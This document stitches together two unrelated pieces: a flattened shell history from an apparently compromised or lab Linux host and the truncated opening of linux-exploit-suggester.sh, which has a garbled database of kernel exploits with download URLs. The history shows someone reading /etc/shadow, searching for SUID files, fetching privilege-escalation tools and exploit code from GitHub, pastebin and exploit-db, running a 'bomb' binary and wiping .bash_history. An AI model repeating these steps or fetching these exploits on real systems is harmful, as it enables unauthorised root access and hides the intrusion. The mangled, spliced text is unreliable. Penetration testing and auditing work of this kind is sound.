echo $SHELL | awk -F'/' '{print $NF}' stty raw -echo LANG=C; printf "command_start_%s" "crqk7lqH"; netstat -a -n; printf "command_done_%s" "23SkYANT" sh -c 'bash -c '\''cat /tmp/nessus.1597883062'\''' clear id ls cd bomba ls cat bomba clear cat bomba.c pwd cd .. ls cd lost+found ls chmod +x lost+found sudo su clear ls cd .. ls hostname uname ls open . cd usuario ls cd home ls cd usuario ls clear cat bomba zls clear ls gcc bomba c gcc bomba.c ls ./a.out chmod +x a.ou ls ./a.out cat a.out wclear clear wget https://www.exploit-db.com/exploits/44302 ls bash --version uname -a htop top ls -la cat .bash_history-02436.tmp cat .bash_history-02130.tmp ls / sudo -s #PATH $PATH cd .local ls -la cd ls $PATH ls /usr/local/bin ls /usr/local/sbin ls -la /usr/local/sbin ping 8.8.8.8 bash -v whoami ls cd bomba ls -lah ./bomba chmod +x bomba ./bomba cat bomba.c nano bomba.c vim bomba.nanp vim bomba.nano vi bomba.nano ls cat a.out ./a.out ps cls clear ps cd .. ls cd lost+found/ ps cd usuario/ ls cd .. ls cd .. ls whoami pwd cd / cd /var/www/html ps su ssh root-admin@45.79.21.153 w ls ssh root-admin@45.79.21.153 history exit echo $SHELL | awk -F'/' '{print $NF}' LANG=C; printf "command_start_%s" "crqk7lqH"; netstat -a -n; printf "comm and_done_%s" "23SkYANT" sudo su sudo su - hostname open . ls /usr/local/bin ls /usr/local/sbin /usr/local/bin whoami ls -lah pwd qexit exit ls cat bomba ls ls -l su -l cat bomba.c cat a.out ls ./a.out ls ls -l cat bomba.c vi bomba.c la -ls los -la ls -la bomba sh bomba ls pwd cd .. ls cd .. ls vim.tiny history history free -h df -h ls cat /etc/*release cat /etc/release* cd /etcc cd /etc ls uname -a uname -n uname -m pwd cd cat /etc/passwd cat /etc/shadow w who last lastb netstat pwd cd .. la ls cd /tmp ls nmap exit mls ls gcc bomba.v gcc bomba.c ls ./a.out ls - ls -arli ls -a ls ls- la ls cd test ls cd bomb ls ./bomb_mudakucker exit sh l ls clear cd test/ ls cd bomb/ ls pwd /home/usuario/test/bomb/bomb_mudakucker cp bomb_mudakucker /tmp cd /tmp ls ./bomb_mudakucker ls -la ./ks-script-9p4glu_2 cat 2 ls clear exit clear find / -perm /4000 -type f 2>/tmp/2 clear find / -perm -u=s -type f find / -perm -u=s -type f 2>/dev/null sudo su mkdir test cd test/ lsclear clear git clear git clone https://github.com/pentestmonkey/unix-privesc-check.git l ls ping google.com ip addrr ip addr ifconfig ip show ip ls clear ls cd unix-privesc-check/ ls ls -la ./upc.sh chmod +x upc.sh ./upc.sh ls .la ls -la cd / ls cat /etc/security/limits.conf dmesg | head -1 cat /proc/version top htop clear ls cd ls cd test mkdir bomb cd bomb/ clear nano bomb.c vim bomb.c vi bomb.v gcc bomb.v -o bomb_mudakucker gcc bomb.c -o bomb_mudakucker ls mv bomb.v bomb.c clear mv bomb.v bomb.c clear gcc bomb.c -o bomb_mudakucker ls ./bomb_mudakucker history ls clear ls -la chmod +x bomb_mudakucker ./bomb_mudakucker uname -a uname -m uname -n uname -all ls cd ls ./a.out ls bash exit ls cd /tmp ls cat 2 cat ./bomb_mudakucker q clear ./bomb_mudakucker chmod u+x bomb_mudakucker ./bomb_mudakucker ls -la cd .. l ls cd ls ls -la cat bomba.c ./bomba cat .bashrc echo $PATH cat .bash_profile clear cat .bash_profile ls -la ./a.out gcc ls cat /etc/issue ip addr ifconfig ls less bomba.c cd .. ls cd / ls cd /var/log ls tail lastlog cd ~ ls cd test/ ls exit ls cd test/ ls cd unix-privesc-check/ ls cat upc.sh ls bash -c upc.sh bash -c ./upc.sh }ls ls vi README.md ls git clone https://github.com/pentestmonkey/unix-privesc-check.git cd .. ls cd bomb/ ls cat bomb.c vi bomb_mudakucker ls cd .. ls cd .. ls cd .. ls cd .. ls ps ax htop q ps ax w uname uname -all uname - uname -a w who cd rm .bash_history exit ls ./bomba sud loadkeys la-latin1 sudo su exit ls cd bomba ls cd test ls cd bomb ls sudo nano bomb_mudakucker cd .. ls cd .. ls sudo nano a.out nano a.out apt install nano pwd show neofetch exit ls whoami su sudo su cd a.out cd test ls ./bomb cd bomb ls cat bomba clear pwd ifconfig.ma who su ls cd .. ls cd .. ls pwd cd ls cd test/ ls cd bomb/ ls nano bomb nano bomb.c vi bomb.c clear ls vi bomb_mudakucker exit ls find . file * ls test/ ls test/unix-privesc-check/ cd test/unix-privesc-check/ ls cat README.md cd .. ls cd .. ls file bomba ls -l file a.out exit cd test la ls xd clear ls cd .. ls clear cd test ls -l ls ps ax ls ll history top exit cat /etc/passwd ls cat bomba.c ls /etc/sudoers ls /etc/sudoers.d cat /etc/os-release cat /etc/sudoers sudo su ls su root usuario su root pwd ls ls .. df -h lsblk blkid pwd ls ls -la cat .bash_logout cat .bashrc rm .bash_his* ls ll ls -la cat .bash_history more .bash_history vi .bash_history ll ls -la echo "" > .bash_history cat .bash_profile ls test cat /etc/shadow cat /etc/passwd echo $PATH ls -la /sbin/halt grep bash /etc/passwd su root ls /etc ls -la / ls htop ls ps -ef ls su root ls / ls .. ls sudo su su root ls more bomba ls clear ls ll sudo su more bomba more bomba.c ls cd .. ls cd /etc ls cd .. ls pwd clear find -name "*.txt" ls cd /home l ls cd usuario/ ls cd .. ls find /home/miusuario -name "*.txt" find /h -name "*.txt" pwd find /home -name "*.txt" find /home -name "*." find /home -name "*.*" /home/usuario/.bash_history more /home/usuario/.bash_history htop ps ps -a wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh ls cd usuario/ ls wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh ping google.es nano prueba.sh clear ls clear uname -a ifconfig cd /var/www/html cd /var/ww/ cd /var/www ls cleart clear nano more /etc/security/limits.conf clear ls -la /etc/security/limits.conf whoami pstree tree ls ps ls /usr/bin cd /root more /root/ more /etc/shadow more /etc/ more /etc/passwd sudo su more /etc/sudoers su root ls ps ls htop top ls /usr/bin/top ls -la /usr/bin/top visudo vi vi enum.sh ls ./a.out ls ps clear ls ./bomba ls ls -arli vi .bashrc ls -arli history ping wget wget -v wget --help uname -m uname -a vim vi ls cat xds.hj ls rm -rf xds.hj ls cat test.sh ls eixt exit ls -la w who last ls ls -la sudo -l ls -la / ps ps -aux ls -la /usr/bin ls pwd env cat /var/spool/mail/usuario file /var/spool/mail/usuario netstat -pnta ss ss -a cat cat /etc/passwd cat /etc/shadow cat /etc/group ls -la pwd cat .bash_history echo "lastdragon se la come :v " for (( ; ; )); do echo "megabyte > last_dragon" ; done for (( ; ; )); do echo "megabyte > last_dragon"; sleep 1 ; done exit ls exit ls cat les.sh cd test ls cd bomb/ ls ./bomb_mudakucker ls cat bomb.c gcc exit ls rm -rf a.out ls rm -rf bomba ls exit ls gcc bomba.c ls ./a.out chmod +x a.out ls ls -alr ls cd test ls cd unix-privesc-check/ ls bash upc.sh l ls cd tools/generate_ cd tools/ ls bash generate_banned.sh cat generate_n cat generate_banned.sh ls nano generate_docs.sh vi generate_docs.sh ls history awk cat /etc/passwd vi /etc/passw vi /etc/passwd ls exit ls exit ls exit ls cd test ls cd bomb ls exit ls rm -rf rm -rf * ls cd .. ls cd .. ls cd wget make whoami sudo sudo su su root wget https://pastebin.com/raw/pQGayDmp -O ahshs.c wget https://hastebin.com/raw/fujipavago -O ahshs.c nano vim editor echo "#include void main() { register int i asm("esp"); printf("$esp = %#010x\n", i); }" > hd.c make hd.c clag clang gcc gcc hd.c cat hd.c g++ hd.c rm -rf * ls sh test.sh /lib/systemd/portable/profile cd /lib/systemd/portable/profile ls ls -ka ls -la cd default/ ls more service.conf ls more service.conf /etc/exports cd /etc/exports ls more /etc/exports /etc/exports clear ls pwd cd .. ls cd . cd .. lks ls cd .. ls more resolv.conf vi resolv.conf ls ls -la systemd-sysv-install .systemd-sysv-install ./systemd-sysv-install ./systemd-sys/sbin/chkconfigv-install /sbin/chkconfig ls /sbin/chkconfig ls -la /sbin/chkconfig ls -la /sbin/ ls -la /sbin/chkconfig/sbin/chkconfig ls clear ls more systemd-sysv-install cd user ls cd ,, ls cd .. ls clear ls ls -la cd .. ls cd gcc ls cd x86_64-redhat-linux/ ls cd 8/ ls ls -la more libgomp.so cd .. ls cd .. ks ls cd .. lls cd .. ls cd clear ls vi test1.sh ls chmod 777 test1.sh sh test1.sh + clear ls vi test2.sh chmod 777 test2.sh clear sh test2.sh clear sh test2.sh clear sh test2.sh ls sh test2.sh clear sh test2.sh -l 0 sh test2.sh ls cd home ls pwd ls cd .. ls cd usuario/ ls ls -ka vi test.sh ls chmod 777 test.sh ls sh test.sh -l 0 ls sh test.sh -l 0 -i ks ls more ahshs.c ls rm test.sh git clone https://github.com/spencerdodd/kernelpop ping google.es ls nc - nc ls curl https://github.com/spencerdodd/kernelpop ls scp unzip ls chmod 777 kernelpop-master.zip ls unzip kernelpop-master.zip ls cd kernelpop-master ls chmod 777 *.py python kernelpop.py python3 kernelpop.py sh create_executable.sh ls python3 python py pytho pythonb clear cd .. ls #!/bin/bash # # Copyright (c) 2016-2020, @_mzet_ # # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under the terms of the GNU General Public License. See LICENSE # file for usage of this software. # VERSION=v1.1 # bash colors #txtred="\e[0;31m" txtred="\e[91;1m" txtgrn="\e[1;32m" txtgray="\e[0;37m" txtblu="\e[0;36m" txtrst="\e[0m" bldwht='\e[1;37m' wht='\e[0;36m' bldblu='\e[1;34m' yellow='\e[1;93m' lightyellow='\e[0;93m' # input data UNAME_A="" # parsed data for current OS KERNEL="" OS="" DISTRO="" ARCH="" PKG_LIST="" # kernel config KCONFIG="" CVELIST_FILE="" opt_fetch_bins=false opt_fetch_srcs=false opt_kernel_version=false opt_uname_string=false opt_pkglist_file=false opt_cvelist_file=false opt_checksec_mode=false opt_full=false opt_summary=false opt_kernel_only=false opt_userspace_only=false opt_show_dos=false opt_skip_more_checks=false opt_skip_pkg_versions=false ARGS= SHORTOPTS="hVfbsu:k:dp:g" LONGOPTS="help,version,full,fetch-binaries,fetch-sources,uname:,kernel:,show-dos,pkglist-file:,short,kernelspace-only,userspace-only,skip-more-checks,skip-pkg-versions,cvelist-file:,checksec" ## exploits database declare -a EXPLOITS declare -a EXPLOITS_USERSPACE ## temporary array for purpose of sorting exploits (based on exploits' rank) declare -a exploits_to_sort declare -a SORTED_EXPLOITS ############ LINUX KERNELSPACE EXPLOITS #################### n=0 EXPLOITS[((n++))]=$(cat <=2.6.5,ver<=2.6.11 Tags: Rank: 1 exploit-db: 1397 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.2 Tags: Rank: 1 exploit-db: 160 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2031 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2004 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2005 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2006 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.13,ver<=2.6.17 Tags: Rank: 1 exploit-db: 2011 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.8,ver<=2.6.16 Tags: Rank: 1 bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/h00lyshit exploit-db: 2013 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.17,ver<=2.6.24 Tags: Rank: 1 exploit-db: 5092 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.23,ver<=2.6.24 Tags: Rank: 1 exploit-db: 5093 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.11,ver<=2.6.22 Tags: Rank: 1 exploit-db: 6851 Comments: world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required EOF ) EXPLOITS[((n++))]=$(cat <=2.6.25,ver<=2.6.29 Tags: Rank: 1 exploit-db: 8369 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11 Rank: 1 exploit-db: 9479 Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: ubuntu=9.04 Rank: 1 analysis-url: https://xorl.wordpress.com/2009/07/16/cve-2009-1895-linux-kernel-per_clear_on_setid-personality-bypass/ src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9435.tgz exploit-db: 9435 Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9436.tgz exploit-db: 9436 Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9641.tar.gz exploit-db: 9641 Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.30 Tags: ubuntu=8.10,RHEL=4|5 Rank: 1 exploit-db: 9545 Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 Tags: Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz exploit-db: 9574 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 Tags: debian=4 Rank: 1 exploit-db: 9575 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19,x86 Tags: fedora=4|5|6,RHEL=4 Rank: 1 exploit-db: 9542 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.31 Tags: Rank: 1 exploit-db: 33321 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.31 Tags: Rank: 1 exploit-db: 33322 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.31 Tags: Rank: 1 exploit-db: 10018 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.26,ver<=2.6.34 Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},ubuntu=(10.04|10.10){kernel:2.6.(32|35)-(19|21|24)-server} Rank: 1 bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/kmod2 bin-url: https://web.archive.org/web/20111103042904/http://tarantula.by.ru/localroot/2.6.x/ptrace-kmod bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/ptrace_kmod2-64 exploit-db: 15023 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<=2.6.34 Tags: ubuntu=9.10 Rank: 1 exploit-db: 12130 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<=2.6.36 Tags: ubuntu=10.04{kernel:2.6.32-24-generic} Rank: 1 bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/can_bcm exploit-db: 14814 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.30,ver<2.6.37 Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},ubuntu=10.04{kernel:2.6.32-(21|24)-generic} Rank: 1 analysis-url: http://www.securityfocus.com/archive/1/514379 src-url: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds bin-url: https://web.archive.org/web/20160602192641/https://www.kernel-exploits.com/media/rds64 exploit-db: 15285 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: ubuntu=(10.04|9.10){kernel:2.6.(31|32)-(14|21)-server} Rank: 1 bin-url: http://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/half-nelson3 exploit-db: 17787 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.34,ver<=2.6.36,x86 Tags: ubuntu=10.10 Rank: 1 exploit-db: 15916 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.34,ver<=2.6.36 Tags: ubuntu=10.10 Rank: 1 exploit-db: 15944 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: Rank: 1 exploit-db: 15774 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: ubuntu=10.04 Rank: 1 exploit-db: 15150 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.33 Tags: RHEL=5 Rank: 1 exploit-db: 15024 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=3.1.0 Tags: ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)} Rank: 1 analysis-url: https://git.zx2c4.com/CVE-2012-0056/about/ src-url: https://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper64 exploit-db: 18411 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.0,ver<=2.6.36 Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server} Rank: 1 src-url: http://vulnfactory.org/exploits/full-nelson.c bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson64 exploit-db: 15704 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.32,ver<3.8.9,x86_64 Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64} Rank: 1 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent64 exploit-db: 26131 author: Andrea 'sorbo' Bittau Comments: No SMEP/SMAP bypass EOF ) EXPLOITS[((n++))]=$(cat <=2.6.32,ver<3.8.9,x86_64 Tags: ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic} Rank: 1 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ src-url: https://cyseclabs.com/exploits/vnik_v1.c exploit-db: 33589 author: Vitaly 'vnik' Nikolenko Comments: No SMEP/SMAP bypass EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<3.7.6 Tags: Rank: 1 exploit-db: 27297 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<3.8.9 Tags: Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2013/04/29/1 exploit-db: 25450 EOF ) EXPLOITS[((n++))]=$(cat <=2.6.32,ver<3.8.9 Tags: RHEL=6 Rank: 1 analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ exploit-db: 25444 EOF ) EXPLOITS[((n++))]=$(cat <=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y Tags: ubuntu=13.10 Rank: 1 analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/timeoutpwn64 exploit-db: 31346 Comments: CONFIG_X86_X32 needs to be enabled EOF ) EXPLOITS[((n++))]=$(cat <=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic} Rank: 1 analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html exploit-db: 31347 Comments: CONFIG_X86_X32 needs to be enabled EOF ) EXPLOITS[((n++))]=$(cat <=2.6.31,ver<=3.14.3 Tags: Rank: 1 analysis-url: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html exploit-db: 33516 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.14 Tags: Rank: 0 analysis-url: https://cyseclabs.com/page?n=02012016 exploit-db: 32926 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.13 Tags: ubuntu=12.04 Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2014/06/10/4 exploit-db: 33824 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.8 Tags: ubuntu=12.04 Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2014/07/08/16 exploit-db: 34134 EOF ) EXPLOITS[((n++))]=$(cat <=3.2,ver<=3.15.6 Tags: Rank: 1 analysis-url: https://cyseclabs.com/page?n=01102015 exploit-db: 36267 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<=3.16.1 Tags: Rank: 1 exploit-db: 34923 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.1,ver<3.17.5,x86_64 Tags: RHEL<=7,fedora=20 Rank: 1 analysis-url: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/ src-url: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz exploit-db: author: Rafal 'n3rgal' Wojtczuk & Adam 'pi3' Zabrocki EOF ) EXPLOITS[((n++))]=$(cat <=3.13,ver<4.1.6,x86_64 Tags: Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2015/08/04/8 exploit-db: 37722 EOF ) EXPLOITS[((n++))]=$(cat <=3.13.0,ver<=3.19.0 Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic} Rank: 1 analysis-url: http://seclists.org/oss-sec/2015/q2/717 bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_32 bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_64 exploit-db: 37292 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=4.3.3 Tags: Rank: 1 analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ exploit-db: 39230 EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=4.3.3 Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic} Rank: 1 analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/ exploit-db: 39166 EOF ) EXPLOITS[((n++))]=$(cat <=3.10,ver<4.4.1 Tags: Rank: 0 analysis-url: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/ exploit-db: 40003 Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working EOF ) EXPLOITS[((n++))]=$(cat <=3.0.0,ver<=4.4.8 Tags: ubuntu=14.04,fedora=22 Rank: 1 analysis-url: https://xairy.github.io/blog/2016/cve-2016-2384 src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c exploit-db: 41999 Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user author: Andrey 'xairy' Konovalov EOF ) EXPLOITS[((n++))]=$(cat <=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules Tags: ubuntu=16.04{kernel:4.4.0-21-generic} Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip Comments: ip_tables.ko needs to be loaded exploit-db: 40049 author: Vitaly 'vnik' Nikolenko EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 Tags: ubuntu=16.04{kernel:4.4.0-21-generic} Rank: 1 analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 exploit-db: 40759 author: Jann Horn EOF ) EXPLOITS[((n++))]=$(cat <=2.6.22,ver<=4.8.3 Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04 Rank: 4 analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh exploit-db: 40611 author: Phil Oester EOF ) EXPLOITS[((n++))]=$(cat <=2.6.22,ver<=4.8.3 Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic} Rank: 4 analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails ext-url: https://www.exploit-db.com/download/40847 Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh exploit-db: 40839 author: FireFart (author of exploit at EDB 40839); Gabriele Bonacini (author of exploit at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2016/12/06/1 Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2016-8655/chocobo_root exploit-db: 40871 author: rebel EOF ) EXPLOITS[((n++))]=$(cat <=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: Rank: 1 analysis-url: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only exploit-db: 41995 author: Andrey 'xairy' Konovalov EOF ) EXPLOITS[((n++))]=$(cat <=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my] Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2017/02/22/3 Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass exploit-db: 41458 author: Andrey 'xairy' Konovalov EOF ) EXPLOITS[((n++))]=$(cat <=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic} Rank: 1 analysis-url: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-7308/exploit exploit-db: 41994 author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url') EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic} Rank: 5 analysis-url: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-16995/exploit.out exploit-db: 45010 author: Rick Larabee EOF ) EXPLOITS[((n++))]=$(cat <=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*} Rank: 1 analysis-url: http://www.openwall.com/lists/oss-security/2017/08/13/1 src-url: 